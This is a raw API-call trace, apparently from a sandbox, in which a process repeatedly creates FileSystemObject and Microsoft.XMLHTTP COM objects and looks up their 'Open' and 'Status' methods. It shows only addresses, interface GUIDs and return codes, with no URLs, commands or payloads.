	[0792.360] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0792.360] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0792.360] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0792.360] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0792.360] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0795.485] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0795.485] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0795.485] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0795.487] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0795.487] SysStringLen (param_1=0x0) returned 0x0
	[0795.487] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0795.487] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0795.487] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0795.487] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0795.487] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0795.487] ??2@YAPEAX_K@Z () returned 0x62f330
	[0795.487] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0795.487] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0795.487] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0795.487] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0795.487] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0795.488] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0795.488] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0795.490] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0795.491] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0795.491] SysStringLen (param_1=0x0) returned 0x0
	[0795.491] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0795.491] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0795.491] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74c0) returned 0x0
	[0795.491] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0795.491] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0795.491] ??2@YAPEAX_K@Z () returned 0x62f310
	[0795.491] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f310) 
	[0795.491] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0795.491] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0795.491] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74c0) returned 0x0
	[0795.492] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74c0) returned 0x3
	[0795.492] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0795.492] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0795.492] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0795.492] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0795.492] SysStringLen (param_1=0x0) returned 0x0
	[0795.492] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0795.492] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0795.492] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0795.493] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0795.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0795.493] ??2@YAPEAX_K@Z () returned 0x62f330
	[0795.493] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0795.493] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0795.493] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0795.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0795.493] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0795.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0795.493] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0795.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0795.493] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0795.494] SysStringLen (param_1=0x0) returned 0x0
	[0795.494] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0795.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0795.494] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0795.494] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0795.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0795.494] ??2@YAPEAX_K@Z () returned 0x62f310
	[0795.494] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f310) 
	[0795.494] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0795.494] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0795.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0795.495] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0795.495] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0795.495] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0795.495] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0795.495] longjmp () 
	[0795.495] longjmp () 
	[0795.495] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0795.495] SysStringLen (param_1=0x0) returned 0x0
	[0795.495] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0795.496] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0795.496] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0795.496] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0795.496] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0795.496] ??2@YAPEAX_K@Z () returned 0x62f330
	[0795.496] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0795.496] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0795.496] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0795.496] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0795.496] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0795.496] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0795.496] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0795.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0795.497] longjmp () 
	[0795.497] longjmp () 
	[0795.497] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0795.497] SysStringLen (param_1=0x0) returned 0x0
	[0795.497] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0795.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0795.497] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0795.497] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0795.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0795.497] ??2@YAPEAX_K@Z () returned 0x62f310
	[0795.498] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f310) 
	[0795.498] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0795.498] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0795.498] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0795.498] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
